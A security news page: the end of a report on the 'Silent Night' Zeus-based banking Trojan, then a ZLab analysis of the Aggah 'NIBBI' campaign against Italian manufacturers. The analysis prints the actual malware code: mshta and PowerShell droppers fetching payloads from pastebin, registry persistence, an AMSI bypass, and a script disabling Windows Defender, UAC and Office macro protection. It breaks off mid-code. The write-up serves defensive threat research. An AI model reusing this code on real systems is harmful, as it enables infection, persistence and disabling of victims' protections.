“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build, $2,000 per month for a general build, while an extra for HVNC functionality is available for 1,000 USD/month and 14 days to test the code for 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1, comparing Axe Bot 1.4.1 and Zloader 1.8.0 C2 source codes, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a naming space or a developer’s handle

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, monitor keystrokes, take screenshots, harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, the decryption is performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for the set up of the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit, experts observed small campaigns, likely for testing purposes. The spreading intensified over time, in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.

Introduction

During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same we identified in the past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019), YAKKA (01/2020). This actor was first spotted by PaloAlto’s UNIT42 in 2018 during wide scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. They also stated the hypothesis of possible overlaps with the Gorgon  APT group, but no clear evidence confirmed that.

However, in order to keep track of all of our report, we synthesized all the monitored campaigns, with their TTPs and final payload:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied in the time, but it maintained some common points. All campaigns used as the initial stage an office document (PowerPoint or Excel) armed with macro and some of them used injection methods. 

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legit Microsoft tool, and used at least an executable file for the infection. In addition, the use of PowerShell stage or the abuse of legit web service has been reported in some campaigns. 

Furthermore the CMSTP bypass exploit is a new feature present only in the 2020, because the first malwares identified to exploit this vulnerability all date back to mid/end 2019, making think the fact that the Threat Actor likes to test the latest disclosed exploits in order to make its campaigns always at the forefront. Regarding persistence mechanisms, we note that initially scheduled tasks were used, but in the latest infections the registry run keys were used. All threats use at least one obfuscation method to make the analysis harder. 

Looking at the evolution of the final payloads, we can say that this evolution is certainly due to a chronological factor, since Revenge rat had become obsolete, but the evolution is also due to the technological factor and its means: revenge rat has the classic functionality of spyware, while AZORult is considered an info stealer. As a last payload, Agent Tesla was used which collects all the functionality of the previous payloads as it is considered an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft Powerpoint weaponized with a malicious macro.

Hash7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3
ThreatMalicious macro
Brief DescriptionMalicious ppt dropper with macro.
Ssdeep192:EFm9QiR1zQRZ0DfZGJjBVySCGVBdJWUpFVzsn6xVNdwWFj/WOvYoZLlmYvJuec9r:i8R1ERZ0DMJjU+bRuxURKMxpcksPY

Table 2. Sample information

The content of the macro is quite easy to read and the content is short and easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible to download and execute malicious code retrieved from pastebin.  j[.mp is an url shortening service, the following request redirect and download a pastebin content:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170) a signed and legit Microsoft tool. Adversaries can use mshta.exe to proxy execution of malicious .hta files, Javascript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is simply URI encoded by replacing each instance of certain characters by one, two or three escape sequences representing the UTF-8 encoding of the character. 

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>’id1CreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\5CzmZ5NS”””
CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn “”Pornhubs”” /tr “”\””mshta\””http:\\pastebin.com\raw\5CzmZ5NS”” /F “,0
‘id2CreateObject(“WScript.Shell”).RegWrite StrReverse(“TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\sJEBiiMw”””, “REG_SZ”‘id3CreateObject(“WScript.Shell”).RegWrite StrReverse(“\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\YL0je2fU”””, “REG_SZ”

‘defidCreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\UyFaSxgj”””CreateObject(“WScript.Shell”).RegWrite StrReverse(“FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\UyFaSxgj”””, “REG_SZ”

self.close</script>

Code Snippet 1

This stage acts as a dropper, in fact, it downloads and executes some pastebin contents through mshta.exe. 

Figure 4: Evidence of the NIBBI author

This lasta campaign has been dubbed with the name of the Pastebin user spreading the malicious pastes. This time the name is “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor and he largely leveraged it in many malicious operations. Moreover, the usage of a legit website such as pastebin (T1102) gives a significant amount of cover such as advantages of being very often whitelisted. Using such a service permits to reduce the C2 exposure. In the past, other groups also used similar techniques to decouple attack infrastructure information from their implant configuration, groups such as APT41, FIN6 or FIN7.

Once decoded the first component (5CzmZ5NS), it unveils some logic, as shown in Code Snippet 2. First of all, the script set a registry key, as a windows persistence mechanism (T1060) in which it place the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX””””, 0 : window.close””)”, “REG_SZ”
CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\iamresearcher”, “$fucksecurityresearchers=’contactmeEX’.replace(‘contactme’,’I’);sal M $fucksecurityresearchers;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$iwannaleftsellingtools.open(‘GET’,’https://pastebin.com/raw/rnS6CUzX’,$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split ‘-‘ |ForEach-Object {[char][byte]””0x$_””};$asciiString= $asciiChars -join ”|M;[Byte[]]$Cli2= iex(iex(‘(&(GCM *W-O*)’+ ‘Net.’+’WebC’+’lient)’+’.Dow’+’nload’+’Str’+’ing(”https://pastebin.com/raw/Rk4engdU”).replace(”#”,”!#!@#”).replace(”!#!@#”,”0x”)’)) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS(‘InstallUtil.exe’,$Cli2)” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ((gp HKCU:\Software).iamresearcher)|IEX”, null, objConfig, intProcessID)’i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way’i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!’i am not a coder! bang 😉
self.close
</script>

Code Snippet 2

The code contains some “funny” comments related to the twitter community of security researchers which constantly monitor the actor operations. Then, the final payload is identified by Rk4engdU paste.

Figure 9: Piece of the rnS6CUz paste

Decoding this hex stream we get the following powershell code:

function UNpaC0k3333300001147555 {
[CmdletBinding()]    Param ([byte[]] $byteArray)  Process {     Write-Verbose “Get-DecompressedByteArray”        $input = New-Object System.IO.MemoryStream( , $byteArray )     $output = New-Object System.IO.MemoryStream            $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
    $puffpass = New-Object byte[](1024)    while($true){        $read = $01774000.Read($puffpass, 0, 1024)        if ($read -le 0){break}        $output.Write($puffpass, 0, $read)        }        [byte[]] $bout333 = $output.ToArray()        Write-Output $bout333    }}
$t0=’DEX’.replace(‘D’,’I’);sal g $t0;[Byte[]]$MNB=(‘OBFUSCATED PAYLOAD ONE‘.replace(‘@!’,’0x’))| g;
[Byte[]]$blindB=(‘OBFUSCATED PAYLOAD TWO‘.replace(‘@!’,’0x’))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
$blind=[System.Reflection.Assembly]::Load($deblindB)[Amsi]::Bypass()
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The Powershell Loader

The Code Snippet 3 is a Powershell script in which the function “UNpaC0k3333300001147555” is declared, having the purpose to manipulate the two payloads in the right way. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As suggested by the name deblindB, invoke the execution of the static method “Bypass” of the “Amsi” class.

Figure 10: Amsi Bypass exploit evidence

Instead, the payload embedded inside the variable $MNB is another type of injection tool, but this one is not executed by the script, probably because both the binaries perform the same action and only one is sufficient.

At this point, we deepen the “sJEBiiMw” component obtaining:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/ygwLUS9C’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 4

This script downloads and executes another script from pastebin: ygwLUS9C. It is a base64 encoded script with some basic string replacing. We also noticed this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.

Figure 11: CMSTP Bypass evidence

However, in this case, there is a new element differently the previous version: through the CMSTP bypass, a VBS script is written in the “\%TEMP%\” folder, which executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed

The VBS script, as also mentioned inside the first row as comment, has the objective to set to zero the level of security of the infected machine. The script is the following:

‘this script will put system on 0 securityIf Not WScript.Arguments.Named.Exists(“elevate”) Then  CreateObject(“Shell.Application”).ShellExecute WScript.FullName _    , “””” & WScript.ScriptFullName & “”” /elevate”, “”, “runas”, 1  WScript.QuitEnd If
On Error Resume NextSet WshShell = CreateObject(“WScript.Shell”)WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable”,”0″,”REG_DWORD”
WScript.Sleep 100
outputMessage(“Set-MpPreference -DisableRealtimeMonitoring $true”)outputMessage(“Set-MpPreference -DisableBehaviorMonitoring $true”)outputMessage(“Set-MpPreference -DisableBlockAtFirstSeen $true”)outputMessage(“Set-MpPreference -DisableIOAVProtection $true”)outputMessage(“Set-MpPreference -DisableScriptScanning $true”)outputMessage(“Set-MpPreference -SubmitSamplesConsent 2”)outputMessage(“Set-MpPreference -MAPSReporting 0”)outputMessage(“Set-MpPreference -HighThreatDefaultAction 6 -Force”)outputMessage(“Set-MpPreference -ModerateThreatDefaultAction 6”)outputMessage(“Set-MpPreference -LowThreatDefaultAction 6”)outputMessage(“Set-MpPreference -SevereThreatDefaultAction 6”)

Sub outputMessage(byval args)On Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ” + args, null, objConfig, intProcessID)

End SubOn Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell $cici=@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,58,92,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,77,115,98,117,105,108,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,97,108,99,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,112,111,119,101,114,115,104,101,108,108,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,119,115,99,114,105,112,116,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,109,115,104,116,97,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,99,109,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,32,61,32,39,100,58,92,39,10,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,41,32,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,97,116,104,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,120,99,108,117,115,105,111,110,10,125,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,41,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,114,111,99,101,115,115,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115,32,36,101,120,99,108,117,115,105,111,110,10,125,10,87,114,105,116,101,45,72,111,115,116,32,34,34,10,87,114,105,116,101,45,72,111,115,116,32,34,89,111,117,114,32,69,120,99,108,117,115,105,111,110,115,58,34,10,36,112,114,101,102,115,32,61,32,71,101,116,45,77,112,80,114,101,102,101,114,101,110,99,101,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,97,116,104,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX”, null, objConfig, intProcessID)
CreateObject(“WScript.Shell”).RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA”,”0″, “REG_DWORD”

Set wso = CreateObject(“WScript.Shell”)wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite 